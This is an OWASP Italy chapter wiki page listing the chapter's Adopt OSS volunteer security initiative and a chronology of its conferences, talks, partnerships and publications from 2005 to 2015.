OWASP - User contributions [en]

Italy

2015-05-15T07:39:32Z

Ikkisoft:

<center>[[Image:OWASP-Italy.PNG]] </center>

==== WELCOME ====

{{Chapter Template|chaptername=Italy|extra=The chapter leader is [mailto:matteo.meucci@gmail.com Matteo Meucci]|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-italy|emailarchives=http://lists.owasp.org/pipermail/owasp-italy}}

<paypal>Italy</paypal>
 

== Adopt OSS. First Edition ==

OWASP Italy is pleased to announce a new initiative: '''Adopt''' '''O'''pen'''S'''ource'''S'''oftware 

Given OWASP’s mission to help organizations with application security, we have established a new initiative to provide free, voluntary-based support to open source software projects. 

Thanks to Adopt OSS, security enthusiasts are paired with participating open source projects, thus gaining exposure to real-life security engineering challenges and the opportunity for career growth. In turn, the participating projects are able to obtain free professional expertise to better improve their security posture, and ultimately build secure software. Over a six months period, OWASP Italy will facilitate the effort by coordinating the initiative and providing support when needed. 

The first edition of this initiative will take place between ''May and November 2015'', and will see the participation of '''7 OWASP Italy members''' and '''3 major OpenSource projects'''. At the end of the six months period, OWASP Italy will publish results and feedback from both volunteers and OSS maintainers. 

The official flyer can be [https://www.owasp.org/images/0/07/AdoptOSSManifest-OWASPItaly.pdf downloaded from here].

===Ntopng===
''Alessio Petracca, Mattia Folador'' 

[http://www.ntop.org/products/traffic-analysis/ntop/ Ntop] is the de-facto standard for real-time network traffic monitoring. OWASP Italy wants to help the project by increasing the security level of ntopng, performing security testing activities and supporting the remediation process. 

We will act in two steps:
* First, a penetration test targeting the web interface of ntopng will be performed, following the [https://www.owasp.org/index.php/OWASP_Testing_Guide_v3_Table_of_Contents OWASP Testing Methodology]
* Secondly, source code review of ntopng main components (such as the C++ core engine) will be statically reviewed. The objective is to address all relevant checks contained within the [https://www.owasp.org/index.php/OWASP_Code_review_V2_Table_of_Contents OWASP Code Review Guide]

In case the activities above are completed before the end of the six-months period, additional activities (such as the development of security plugins) will be discussed.
Luca Deri and Arianna Avanzini will support Alessio Petracca and Mattia Folador in these activities, by providing guidance and insights.

===WordPress===
''Paolo Perego, Sandro Zaccarini'' 

[https://wordpress.org/ WordPress] is the facto standard for web publishing. If you need a blog, if you need a new showcase website for your portfolio or a tiny e-commerce web site for your small company you will look at WordPress to start. 

Paying the cost to be the boss, WordPress during the years suffered tons of security issues, 3 major issues only in the beginning of May 2015. Either the core, plugins and themes are developed with easy to use in mind and they need to be hardened. 

OWASP Italy wants to support WordPress adopting it with the "Stand by WordPress" initiative. We will deploy the software in three different standard configurations: blog, company's portfolio and e-commerce. 

We will do continuous appsec during development of 4.3 version in order to quickly spot security issues before the August release. In addition, we will take care of hardening guidelines and both plugins and themes subsystems in order to improve overall architecture security level.

===GlobaLeaks===
''Luca Carettoni, Giovanni Cerrato, Marco Lancini''

[https://www.globaleaks.org/ GlobaLeaks] is the first open-source whistleblowing framework. It empowers anyone to easily set up and maintain an anonymous whistleblowing platform. 

Considering the potential hostile environments in which the application may be hosted, security vulnerabilities and abuses are primary concerns for GlobaLeaks’ maintainers. 

We want to help the team in their excellent application security practices, by performing vulnerability research activities in order to discover unknown bugs within the boundaries of their specific [https://docs.google.com/document/d/1niYFyEar1FUmStC03OidYAIfVJf18ErUFwSWCmWBhcA/pub threat model]. In particular, we will be focusing on two main software components (GLBackend and GLClient) and new security-relevant changes (upcoming authentication re-factoring and end-to-end encryption). 

For more information on '''Adopt OSS''', please send an email to [mailto:owasp-italy@lists.owasp.org owasp-italy@lists.owasp.org]
 

== OWASP-Isaca Conference @ Rome 11-12th December 2014 ==
The agenda is online! 
http://www.isacaroma.it/images/owasp_agenda_11-12-12-2014.JPG

 

== OWASP-Isaca Conference @ Venice 3rd October 2014 ==
The agenda: 
[[File:Venice2014.jpg]]
 
Here is the [https://www.owasp.org/images/d/d3/OWASPVenice2014.pdf flyer]

== OWASP-Italy Day @ the University of Genova (14th May 2014) ==
Thank to the collaboration with [http://www.ai-lab.it/armando Prof. Alessandro Armando] and to the availability of Gary McGraw, Ph.D. CTO, Cigital we are planning an incredible [https://www.owasp.org/index.php/Italy_OWASP_Day_2014_Genova OWASP Day next 14th May].
 

 
== OWASP Italy @ Security Summit 2014 ==
OWASP Italy participated to the Security Summit 2014 in Milan with 3 talks. 
[https://www.securitysummit.it/milano-2014/seminari-associazioni/talk-34/ See here for all the details] 
 

== OWASP EU Tour 2013 - 27th June - Rome==

<noinclude>{{:EUTour2013 header}}</noinclude>

Thanks to the collaboration with Università Degli Studi Roma Tre, next 27th June we will have the OWASP EU Tour Rome Conference. 
OWASP Europe TOUR, is an event across the European region that promotes awareness about application security, so that people and organizations can make informed decisions about true application security risks. Everyone is free to participate in OWASP and all of our materials are available under a free and open software license.

The conference will be held at Università Degli Studi Roma Tre. Address: Via Vito Volterra, 62, Rome.

[https://www.owasp.org/index.php/EUTour2013_Rome_Agenda Here you can find the agenda and all the information to participate]

== OWASP Italy @ Security Summit 2013 ==

OWASP Italy participated to the Security Summit 2013 in Milan with 2 talks. 
[http://milano2013.securitysummit.it/eventi/view/35 See here for all the details] 

== OWASP Italy Day 2012: "Web Security in a Mobile World" ==

<center>[[File:OWASPITDay2012.jpg]] </center>

We are pleased to announce that the [http://www.owasp.org/index.php/Italy OWASP Italy chapter] will host the OWASP Italy Day 2012 conference in Rome, Italy at the University of Rome La Sapienza next 23rd November 2012.

More information [https://www.owasp.org/index.php?title=Italy_OWASP_Day_2012 here]

== OWASP-Italy Board ==

*This is the '''OWASP-Italy Board''':
Founder and Chair: Matteo Meucci (Jan 2005) 
OWASP Italy Board: Paolo Perego, Luca Carettoni, Antonio Parata, Giorgio Fedon, Stefano Di Paola, Mauro Bregolin, Claudio Merloni, Raoul Chiesa.

==== Partnerships ====

*ISC2-Italian Chapter: Thanks to Marco Misitano, Paolo Ottolino and Claudio Sasso, OWASP Italy collaborates with the ISC2-Italian Chapter for new initiatives regarding Security Conferences, articles and contentes regarding SDLC.

[http://www.isc2chapter-italy.it https://www.owasp.org/images/a/a3/ISC2Italy.jpg]

*CSA Italy Partnership

[http://chapters.cloudsecurityalliance.org/italy/ https://www.owasp.org/images/6/6a/CSAItalylogo.gif]

Thanks to Alberto Manfredi (CSA Italy President) we are starting a collaboration with the Italian Chapter of the Cloud Security Alliance.

*IsecLab Partnership

[http://www.iseclab.org http://www.owasp.org/images/4/4b/LogoIsecLab.png]

We are beginning a collaboration with David Balzarotti and Marco Balduzzi of International Secure Systems Lab(IsecLab) with the goal of sharing and improving new WebAppSec projects. 

*CLUSIT Member

http://www.clusit.it/logo_clusit/clusit_logo_b130.gif

Thanks to CLUSIT and OWASP Foundation we have established a cross-membership between the two organizations. So OWASP-Italy is now a [http://www.clusit.it/soci.htm CLUSIT member] and CLUSIT is an OWASP Educational Member.

*ISACA Rome

[http://www.isacaroma.it http://www.owasp.org/images/9/98/Isacaroma.gif]

Thanks to Ugo Spaziani, we are developing seminars and new ideas with ISACA Rome. 

==== News ====

== Security Summit 2012 ==
- 21st March 2012, OWASP Italy will present 3 talks:

- Antonio Parata e Paolo Perego:"Security Testing for developers" 
- Giorgio Fedon: "Banking Malware evolution in Italy: defense approach" 
- Stefano Di Paola:"DOM Xss: la nuova generazione di vulnerabilità applicative" 
Please subscribe for free here: https://www.securitysummit.it/eventi/view/21

== Security Summit 2011 ==
- 15th March 2011, OWASP-Italy presented a seminar about OWASP news. 
Here you can download the presentations: 
- Matteo Meucci: "[http://www.owasp.org/images/5/51/Security_Summit_2011_-_Meucci.pdf OWASP Future and the OWASP Guidelines: how your company can adopt it to obtain best results]" 
- Paolo Perego: "[http://www.owasp.org/images/2/20/I_tool_OWASP_per_la_sicurezza_del_software_20110315.pdf OWASP tools for the Software Security]" 
- Giorgio Fedon: "[http://www.owasp.org/images/a/a0/Owasp_at_Security_Summit_2011_-_Mythbreaking_Automatic_Code_review_Tools.pdf Myth Busting Automatic Code Review tools]" 
More information here: https://www.securitysummit.it/eventi/view/24

'''OWASP Books are out!'''

Now you can download or buy a book on the OWASP Projects. Check it here: http://stores.lulu.com/owasp

==== Activities ====

*(Jun 10): OWASP Testing Guide presentation at FBK (Fondazione Bruno Kessler).

*(May 10): OWASP Training at London: last 28th May in London, OWASP leaders deliver a course focused on the main OWASP Projects. This course aims to change that by providing a selection of mature and enterprise ready projects together with practical examples of how to use them.
This Course was FREE for OWASP Members.
http://www.owasp.org/index.php/London/Training/OWASP_projects_and_resources_you_can_use_TODAY

*(Jan 09) OWASP Testing Guide v3 is finished! You can download or browse it [http://www.owasp.org/index.php/Category:OWASP_Testing_Project here]

*(Mar 07) Luca Carettoni has published an interview to OWASP-Italy (OWASP interviews OWASP :) )

[http://blog.html.it/archivi/2007/02/26/quattro-chiacchiere-con-owasp-italia.php Here] the full article.

*(Oct 06) ISACA Roma has published several interview with OWASP-Italy members:

[[http://www.isacaroma.it/html/newsletter/node/276 Matteo Meucci]] [[http://www.isacaroma.it/html/newsletter/node/287 Alberto Revelli]] [[http://www.isacaroma.it/html/newsletter/node/282 Antonio Parata]] [[http://www.isacaroma.it/html/newsletter/node/285 Paolo Perego]] [[http://www.isacaroma.it/html/newsletter/node/328 Carlo Pelliccioni]] 

*(Sep 06) Paolo Perego has created the new '''OWASP Orizon Project'''. Go to [http://www.owasp.org/index.php/Category:OWASP_Orizon_Project OWASP Orizon Project] 

*(Sep 06) Matteo Meucci has been selected as the new editor of the '''OWASP Testing Guide v2'''. See OWASP [http://www.owasp.org/index.php/OWASP_Autumn_Of_Code_2006_:_Selected_Projects_Press_Release press release] and go to [http://www.owasp.org/index.php/OWASP_Autumn_of_Code_2006_-_Projects:_Testing_Guide OWASP Testing Project v2]

*(Sep 06) Carlo Pelliccioni is writing an article about the [http://www.owasp.org/index.php/Analysis_about_error_codes analysis of error codes] received by web servers.

*Top10 Vulnerabilities - OWASP-Italy survey:

[[Image:Top 10 vulnerabilities-mini.GIF]]

*(21 Jun 06) '''Infosecurity 2006''': the event is organized and managed by the CLUSIT.

Alberto Revelli and Matteo Meucci will partecipate as speakers at the seminar: "Web Application Security: guidelines and security auditing for web applications". [http://www.infosecurity.it/Roma/programma.php More info here]

*(1 Jun 06) '''"Quaderno CLUSIT"'''

CLUSIT has published a book entitled: "La verifica della sicurezza di applicazioni Web-based e il progetto OWASP". Several OWASP-Italy members (R.Chiesa, L.De Santis, M.Graziani, L.Legato, M.Meucci, A.Revelli) have contributed to the writing. The document is now reserved to CLUSIT members, but will be made public in about 3 months.

*(31 May 06) Luca Carettoni has published the article '''"La sicurezza delle applicazioni Web secondo l'Open Web Application Security Project".''' [http://sicurezza.html.it/articoli/leggi/1721/la-sicurezza-delle-applicazioni-web-secondo-lopen-/ Here]you can read the full article.

*(1 Mar 06) '''OWASP-Boston, Microsoft'''

Thanks to Jim Weiler, Matteo Meucci has presented "Anatomy of two web attacks" at the OWASP-Boston meeting. [http://www.owasp.org/local/boston.html More info here]

*(18 Nov 05) '''IDC - European Banking Forum'''

Thanks to Raoul Chiesa (Director of Communication OWASP-Italy), we will have a great speech at the [http://www.idc.com/italy/events/banking05/banking05_agenda.jsp IDC European IT Banking Forum 2005]. Agenda: - New standards for the ICT security auditing in the italian banking scenario: OSSTMM and OWASP. Raoul Chiesa, Director of Communications, ISECOM/OWASP-Italy and Matteo Meucci, OWASP-Italy Chair - Workshop: unusual form of attacks and banking system violation: live experience. Raoul Chiesa, Director of Communications, ISECOM/OWASP-Italy

*(Oct 05) '''SMAU 2005''' is the 42a International ICT & Consumer Electronics Exhibition for Italy.

SMAU has accepted our submission! [http://www.webb.it/event/eventview/4488/1/progetto_owasp__case_study_di_applicativi_web_vulnerabili More info here]

*(Giu 05) Thanks to Massimiliano Graziani we have translated in italian the '''"OWASP Pen Test Checklist v.1.1"'''. You can download it [http://www.owasp.org/documentation/testing.html here.]

Thanks to the collaboration with CLUSIT, this doc is available also [http://www.clusit.it/whitepapers.htm here.]

*(May 05) '''ISACA Roma Newsletter''' has published an [http://www.isacaroma.it/html/newsletter/?q=node/78 interview to OWASP-Italy]

*(Apr 05) We have written an article describing the OWASP projects, Web Application Security and the next challenges. '''ICT Security'''.(the italian magazine about Information Security) has published the article on the number 33 - April 2005.

*The presentation of the seminar we have done in '''ISACA Rome''' (31th March 2005) is now available [http://www.isacaroma.it/pdf/050331/meucci.zip here.]

*(Apr 05) We have published a presentation describing a detailed case study of a web application vulnerabilty [http://www.owasp.org/images/7/72/MMS_Spoofing.ppt (MMS Spoofing)].

*(Mar 05) Thanks to Matteo Paolelli we have translated the '''"OWASP Top Ten Vulnerabilties in Web Application Security"''' in italian language. You can download it [http://www.owasp.org/docroot/owasp/projects/topten/OWASPTopTen2004-ITA.pdf here].

*[http://www.isacaroma.it/html/newsletter/?q=node/78 Here] you can read an interview talking about OWASP.

==== Events ====

=== 15th March, 2011 - OWASP-Italy@Security Summit ===

- 15th March 2011, OWASP-Italy presented a seminar about OWASP news. 
Here you can download the presentations: 
- Matteo Meucci: "[http://www.owasp.org/images/5/51/Security_Summit_2011_-_Meucci.pdf OWASP Future and the OWASP Guidelines: how your company can adopt it to obtain best results]" 
- Paolo Perego: "[http://www.owasp.org/images/2/20/I_tool_OWASP_per_la_sicurezza_del_software_20110315.pdf OWASP tools for the Software Security]" 
- Giorgio Fedon: "[http://www.owasp.org/images/a/a0/Owasp_at_Security_Summit_2011_-_Mythbreaking_Automatic_Code_review_Tools.pdf Myth Busting Automatic Code Review tools]" 
More information here: https://www.securitysummit.it/eventi/view/24

=== November, 2010 - OWASP-Italy Day V ===

- OWASP Day for E-Gov 2010: 9th November 2010 - Rome. 
An event organized by Consip. More information [http://www.owasp.org/index.php/Italy_OWASP_Day_E-Gov_10 here]

=== November, 2009 - OWASP-Italy Day IV ===

----
Following on from the great success of last OWASP Days the forth conference has taken place in November 2009 in Milan. 
More information [http://www.owasp.org/index.php/Italy_OWASP_Day_4 here] 

OWASP Day for E-Gov 2009: 5th November 2009 - Rome. 
More information [http://www.owasp.org/index.php/Italy_OWASP_Day_E-Gov_09 here]

=== 31st March, 2009 - OWASP-Italy @ PCI Milan ===

----

Matteo Meucci was invited to talk about OWASP Testing Guide and PCI-DSS Standard at the [http://www.pci-portal.com/lang-en/events/event-info/pcimilan PCI Milan event] last 31st March.

The presentation is published [http://www.owasp.org/images/3/38/MeucciPciMilan09.pdf here]

=== 23rd February, 2009 - OWASP Day III ===

----

[http://www.owasp.org/index.php/Italy_OWASP_Day_3 "Web Application Security: research meets industry"] Presentations are online!

=== 10th October, 2008 - Isaca Roma PCM 2008 ===

----

Matteo Meucci presented the new OWASP Projects and the Application Security in the Italian Companies. More information [http://www.isacaroma.it/html/ArchivioEventi-081010.html here]

=== 31st March, 2008 - OWASP Day II ===

----

[http://www.owasp.org/index.php/Italy_OWASP_Day_2 "The State of the Art of the Web Application Security and the OWASP guidelines in the Companies"] Presentations are online!

=== February 2008 - OWASP Italy at InfoSecurity 2008 ===

----

5th February:

*14:30 - The Owasp Orizon project: internals and hands on

[http://www.infosecurity.it/IT/eventi-sicurezza-informatica/convegni_94.aspx Paolo Perego]

6th February:

*14:30 - Costruire Software Sicuro dalle Fondamenta

[http://www.infosecurity.it/IT/eventi-sicurezza-informatica/convegni_128.aspx Antonio Parata]

7th February:

*10:30 - Tu programmi. Io buco.

[http://www.infosecurity.it/IT/eventi-sicurezza-informatica/convegni_137.aspx Luca Carettoni]

[http://www.infosecurity.it Here] you can read more information about it.

 

=== November 30th, 2007 - OWASP-Italy @ Elsag Datamat Security Forum ===

----

Matteo Meucci was invited to talk about OWASP Guidelines and SDLC Security at the Elsag Datamat Security Forum 2007 Where: Pescara When: 30th November 2007, h.12.30

=== October 20th, 2007 - OWASP Italy at SMAU E-Academy 2007 ===

----

Last 20th October 2007 we had 5 speeches at SMAU E-Academy 2007, here you can download our presentations:

*Giorgio Fedon, COO at Minded Security:

[http://www.owasp.org/.pdf "Dove sono finiti i miei soldi? Internet Banking e Cross Site Scripting"] (coming soon) [[Image:FedonSMAU07.pdf]]

*Paolo Perego, Senior Security Consultant at Spike Reply:

[https://www.owasp.org/images/7/79/PeregoSMAU07.ppt "The Owasp Orizon project - bring security at the source"]

*Antonio Parata, Security Consultant at eMaze:

"Valutazione del rischio tramite la logica fuzzy" (coming soon) [[Image:ParataSMAU07.pdf]]

*Alberto Revelli, Senior Security Consultant at Portcullis Security:

[http://www.owasp.org/images/9/9f/RevelliSMAU07.pdf "Anti-Anti-XSS: bypass delle difese del browser"]

*Stefano Di Paola, CTO at Minded Security:

"Cros-site Flashing! Gli attacchi Web di ultima generazione parlano multipiattaforma" (coming soon) [[Image:DiPaolaSMAU07.pdf]]

 

=== September 10th, 2007 - OWASP Day WorldWide: "Privacy in the 21st Century" ===

----

https://www.owasp.org/index.php/Italy_OWASP_Day_1

 

=== May 29th, 2007 - Seminar: "Software Security" ===

----

*Stefano Di Paola, Paolo Perego and Matteo Meucci will talk at the Seminar: [http://www.sicurinfo.it/informazioni/visinf.asp?IDInfo=246&CAT=53 "Which approaches to Software Security"] organized by Firenze Tecnologia.

 

=== May 15th-17th, 2007 - 6th OWASP AppSec Conference in Italy ===

----

*We are in the initial planning stages for the next OWASP Europe conference, which we plan to hold in Italy in May 2007.

[http://www.owasp.org/index.php/6th_OWASP_AppSec_Conference_-_Italy_2007 Here] you can find all the details about the conference, cfp and sponsorship.

=== April 14th, 2007 - Master on Information Security, University of Rome "La Sapienza" ===

----

*We have done a 4h seminar for the students of [http://mastersicurezza.uniroma1.it/ Master on Information Security at "La Sapienza"] for the [http://icsecurity.di.uniroma1.it/dokuwiki/doku.php?id=projects:asp Application Security Project of "La Sapienza" University.]

 

=== March 30th, 2007 - University of Rome "La Sapienza" ===

----

*Thanks to Prof. Mancini and Roberto D'Addario, we will talk about OWASP at the convention "Institutions, Companies and Information Security: comparing the problems"

[http://w3.uniroma1.it/security/Eventi/eventi.html Here] you can find more details.

 

=== March 1st, 2007 - EuSecWest 07 ===

----

Alberto Revelli and Matteo Meucci presented the new OWASP Testing Guide at [http://www.eusecwest.com/agenda.html EUSecWest]. [http://www.owasp.org/images/e/e9/OWASP_Testing_Guide_Presentation_EUSecWest07.zip Here] you take a look at the presentation.

=== February 6th-8th, 2007 - InfoSecurity ===

----

*February 6th:15.30

After the great success obtained form CCC at Berlin, Stefano Di Paola and Giorgio Fedon will talk about:" Web Security Client Side: attacks at Web 2.0" More information [http://www.infosecurity.it/it/infosecurity.aspx?ID_Portale=Z6skuJTSHr%2fjF7janL35RA%3d%3d&ID_Pagina=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl1=mllS8ehP3VwfAOVCVR5ckw%3d%3d&ID_MenuLvl2=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl3=fPsJu6gF%2blBE8LaUGEMYLw%3d%3d&Lang=l51VDVQfL9BdevTm%2fsJx0Q%3d%3d&ID_Evento=aqfi82GOKd6I748s1evI8Q%3d%3d&ExtControl=FQQ52p7AGBUZth0l9Qw6MSOcqIebAeaBYiSFezT6eKEvZkQfILymgy7truUG7ii4 here].

*February 6th:16.30

After the great effort on the Testing Guide Project, Matteo Meucci and Alberto Revelli will present: "The new OWASP Testing Guide" More Information [http://www.infosecurity.it/it/infosecurity.aspx?ID_Portale=Z6skuJTSHr%2fjF7janL35RA%3d%3d&ID_Pagina=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl1=mllS8ehP3VwfAOVCVR5ckw%3d%3d&ID_MenuLvl2=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl3=fPsJu6gF%2blBE8LaUGEMYLw%3d%3d&Lang=l51VDVQfL9BdevTm%2fsJx0Q%3d%3d&ID_Evento=nq6tSIuRoPVJBanBSsRiSQ%3d%3d&ExtControl=FQQ52p7AGBUZth0l9Qw6MSOcqIebAeaBYiSFezT6eKEvZkQfILymgy7truUG7ii4 here].

*February 7th:12.30

Authors of innovative SQL injection tools, Alberto Revelli and Antonio Parata will show: "Advanced SQL Injection: testing tools and defensive strategies." More Information [http://www.infosecurity.it/it/infosecurity.aspx?ID_Portale=Z6skuJTSHr%2fjF7janL35RA%3d%3d&ID_Pagina=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl1=mllS8ehP3VwfAOVCVR5ckw%3d%3d&ID_MenuLvl2=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl3=fPsJu6gF%2blBE8LaUGEMYLw%3d%3d&Lang=l51VDVQfL9BdevTm%2fsJx0Q%3d%3d&ID_Evento=3z04F5BgZRgfU0YX8JRYtA%3d%3d&ExtControl=FQQ52p7AGBUZth0l9Qw6MSOcqIebAeaBYiSFezT6eKEvZkQfILymgy7truUG7ii4 here]

*February 7th:13.30

Author of the new OWASP Orizon project, Paolo Perergo will present:"Secure programming: from theory to practice" More Information [http://www.infosecurity.it/it/infosecurity.aspx?ID_Portale=Z6skuJTSHr%2fjF7janL35RA%3d%3d&ID_Pagina=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl1=mllS8ehP3VwfAOVCVR5ckw%3d%3d&ID_MenuLvl2=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl3=fPsJu6gF%2blBE8LaUGEMYLw%3d%3d&Lang=l51VDVQfL9BdevTm%2fsJx0Q%3d%3d&ID_Evento=9HePIzyo5p29ylpGBl6CiA%3d%3d&ExtControl=FQQ52p7AGBUZth0l9Qw6MSOcqIebAeaBYiSFezT6eKEvZkQfILymgy7truUG7ii4 here].

=== January 25th, 2007 - Isaca Rome ===

----

Matteo Meucci will discuss the new [http://www.owasp.org/index.php/Category:OWASP_Testing_Project OWASP Testing Guide v2] For more information: http://www.isacaroma.it/html/GiornateDiStudio.html

=== October 7th, 2006 - SMAU 2006 ===

----

- "''The quest for secure code: code review and fundamental of secure coding.''" Matteo Meucci will present an introduction to the new OWASP Projects and OWASP-Italy activities. Paolo Perego (sp0nge) will speak about safe coding and the importance of code periodic review as natural software life cycle. Paolo will give a vision on code review and its phases http://www.webb.it/event/eventview/5772

Here are the presentations: [[Image:Meucci SMAU06.pdf|Meucci_SMAU06]] [[Image:Perego SMAU06.pdf|Perego_SMAU 06]]

- "''Advanced SQL Injection.''" Antonio Parata (S4tan) will explain SQL Injection, and how SQL Inference works on PHP/MySql platform. He will present an open source tool to support the testing. Alberto Revelli (icesurfer) will focus on Microsoft SQL Server: he will perform a live demo of sqlninja (http://sqlninja.sf.net), explaining how to obtain a pseudo-shell over SQL, how to escalate privileges, and how to play with the exotic equation: "SQL Injection + debug.exe + DNS = DOS prompt" ! http://www.webb.it/event/eventview/5774

[[Image:Revelli SMAU06.pdf|Revelli_SMAU06]] [[Image:Parata SMAU06.pdf|Parate_SMAU06]] 

[[Image:OWASP-Italy at SMAU06 2.JPG]] Luca, Carlo, Alberto, Antonio, Stefano Matteo, Paolo, Giorgio

=== September 29th, 2006 - OpenExp 2006 ===

----

September 30th, at 10:45 Antonio Parata (S4tan) will speak about SQL Injection: techniques, tools and practical examples.

Abstract: Antonio will introduce some basic concepts about software security. It will be shown how SQL Inference works on PHP/MySql platform and presented an open source tool to support the testing. Finally will be listed some advises to avoid common bugs. http://www.openexp.it/

OWASP-Italy will have a stand from September 29th to October 1st.

[[Image:Antonio Matteo Carlo.JPG]] [[Image:Antonio speech.JPG]] [[Image:Carlo.JPG]] [[Image:Claudio Luca.JPG]] [[Image:Mayhem Matteo.JPG]] [[Image:OWASP Banner2.JPG]] [[Image:OWASP Banner.JPG]]

=== June 21th, 2006 - InfoSecurity 2006 ===

----

Alberto Revelli and Matteo Meucci will partecipate as speakers at the seminar: "Web Application Security: guidelines and security auditing for web applications". The event is organized and managed by the CLUSIT.

Where: Sheraton Roma Hotel - Viale Del Pattinaggio, 100 When: 10,30 - 17,00 Who: Matteo Meucci and Alberto Revelli Link: http://www.infosecurity.it/Roma/programma.php

Agenda: -- I Session -- Introduction to Web Application Security • Which are the risks? • Risk assessment of a web application • Core pillars of web security How to develop secure web applications: • Guidelines and case-studies

-- II Session -- How to realize a security audit of a web application • The methodology OWASP Penetration Testing • The tools: OWASP WebScarab • Hands-on web application vulnerabilities: OWASP WebGoat • Advanced SQL Injection.

 

=== March 1st, 2006 - OWASP-Boston, Microsoft ===

----

Thanks to Jim Weiler (OWASP-Boston Chair), Matteo Meucci has presented "Anatomy of two web attacks" at the OWASP-Boston meeting of march. [http://www.owasp.org/index.php/Boston More info here]

=== November 5th, 2005 - IDC - European Banking Forum ===

----

Thanks to Raoul Chiesa (Director of Communication OWASP-Italy), we have had a great speech at the IDC European IT Banking Forum 2005 (18 Nov 2005). http://www.idc.com/italy/events/banking05/banking05_agenda.jsp Agenda:

*New standards for the ICT security auditing in the italian banking scenario: OSSTMM and OWASP. Raoul Chiesa, Director of Communications, ISECOM/OWASP-Italy and Matteo Meucci, OWASP-Italy Chair
*Workshop: unusual form of attacks and banking system violation: live experience. Raoul Chiesa, Director of Communications, ISECOM/OWASP-Italy.

You can download the report [http://cdn.idc.com/italy/downloads/report_banking05_eng.pdf here].

You can download the Case-Study of a vulnerable Home Banking Web Application [http://www.owasp.org/docroot/owasp/misc/IDC_BankingForum05v1.ppt here].

=== October 5th, 2005 - OWASP-Italy@SMAU2005 ===

----

SMAU is the 42a International ICT & Consumer Electronics Exhibition for Italy. Alberto Revelli (our Technical Director) and Matteo Meucci have conducted a seminar talking about Web Application Security. Alberto has presented his new project: [http://sqlninja.sourceforge.net sqlninja]. Very cool!!

http://www.webb.it/event/eventview/4488/1/progetto_owasp__case_study_di_applicativi_web_vulnerabili

=== May 25th, 2005 - ISACA Rome 2nd meeting ===

----

May 25th we'll be in ISACA Rome to present OWASP WebGoat and a real case of a Web Application Vulnerability. Every one is invited to join the meeting.

Here is the agenda: 14.30 Registration 14.45 Matteo Meucci - Web Application Security Phase II - OWASP WebScarab and PenTest Checklist

*A case-study of a Web Application Vulnerability: MMS Spoofing

--- Web Application analysis --- Authentication and Billing of the MMS service --- Vulnerabilities --- Attack Analysis

*Learning the most common web application vulnerabilities: OWASP WebGoat

--- Http Basics --- HTML Clues --- Hidden Field Tampering --- How to spoof a Session Cookie --- Stored Cross Site Scripting --- Command Injection --- SQL Injection --- Fail Open Authentication

The meeting is hold at: Via Volturno, 65 (Rome) - Auditorium ATAC

You can download the presentation [http://www.isacaroma.it/pdf/050525/OWASP.zip here].

=== May 18th, 2005 - Workshop on Computer Crime 2005 ===

----

 May 18th, 2005 OWASP-Italy is invited to present OWASP Top 10 to the "Workshop on Computer Crime 2005" titled: "EVOLUZIONI NORMATIVE E RECENTI PROBLEMATICHE DI SICUREZZA"

The meeting is held at: Sala delle conferenze dell'Istituto Centrale della Banche Popolari Italiane Via Verziere, 11

You can download the presentation [http://www.owasp.org/images/a/aa/Top10-ComputerCrimes.ppt here].

=== March 31th, 2005 - ISACA Rome meeting ===

----

March 31th we'll be in ISACA Rome to present OWASP and the Web Application Security. Every one is invited to join the meeting.

Here is the agenda: 14.15 Registration 14.30 Matteo Meucci - Web Application Security - OWASP Guide: how to build secure web application - How to test your Web Application: WebScarab and the WebApp PenTest Checklist - How to learn the most common web application vulnerability: WebGoat - The Top Ten WebApp vulnerabilities - Common error on developing Web Application: Authentication mechanisms not "secure" Buffer Overflow and crash of the service Thief of identity: Cross Site Scripting Manipulation of company data: SQL Injection Reserved information: misconfiguration Bad session management and thief of identity - OWASP-Italy: projects and next challenges

The meeting is hold at: Via Volturno, 65 (Rome) - Auditorium ATAC http://www.isacaroma.it/html/GiornateDiStudio.html

You can download the presentation [http://www.isacaroma.it/pdf/050331/meucci.zip here].

=== March 21th, 2005 - OWASP-Italy conducts a seminar in AlmaWeb ===

----

March, the 21th OWASP-Italy has been invited at the University of Bologna to conduct a seminar regards to [http://www.almaweb.unibo.it/830.dyn Master in Management and Information Technology] titled “Web Application Security and OWASP”.

Here is the agenda: - OWASP & Web Application Security - Common Web Application Vulnerabilities - A real case of web application vulnerability: MMS Spoofing&Billing - Training: WebGoat

==== Publications ====

=== October 2009 Interview on "Il sole 24 ore" ===
----

[http://www.owasp.org/images/5/5c/Nova09.pdf Gary McGraw and Matteo Meucci] interviewed by NOVA, talking about BSIMM and OWASP.

=== March, 2007 Interview on HTML.it ===

----

Luca Carettoni has published an interview to OWASP-Italy (OWASP interviews OWASP :) ) [http://blog.html.it/archivi/2007/02/26/quattro-chiacchiere-con-owasp-italia.php Here] the full article.

=== October, 2006 ISACA Roma interviews OWASP-Italy ===

----

After the speeches that OWASP-Italy has done at [http://www.smau.it/catnews.asp?l=2&codcat=385 SMAU E-Academy 2006], ISACA Roma has interviewed some of the people of the Italian chapter. Follow the links for the full interviews (in italian): [[http://www.isacaroma.it/html/newsletter/node/276 Matteo Meucci]] [[http://www.isacaroma.it/html/newsletter/node/287 Alberto Revelli ]] [[http://www.isacaroma.it/html/newsletter/node/282 Antonio Parata]] [[http://www.isacaroma.it/html/newsletter/node/285 Paolo Perego]] [[http://www.isacaroma.it/html/newsletter/node/322 Stefano Di Paola & Giorgio Fedon]]

=== Aug, 2006 - Article on Banca Finanza magazine ===

----

Banca Finanza, the italian magazine about finance and banking, has interviewed Raoul Chiesa talking about the new risks for the on-line banking security. Raoul speaks about OWASP and web application security [[Media:042006BF.pdf]]

=== June, 2006 - Quaderno CLUSIT ===

----

CLUSIT has published a book entitled: "La verifica della sicurezza di applicazioni Web-based e il progetto OWASP". Several OWASP-Italy members (R.Chiesa, L.De Santis, M.Graziani, L.Legato, M.Meucci, A.Revelli) have contributed to the writing. The document is now reserved to CLUSIT members, but it will be public in about 3 months.

=== June, 2006 - Paper on SQL Injection and Inference on PHP/MySQLInference ===

----

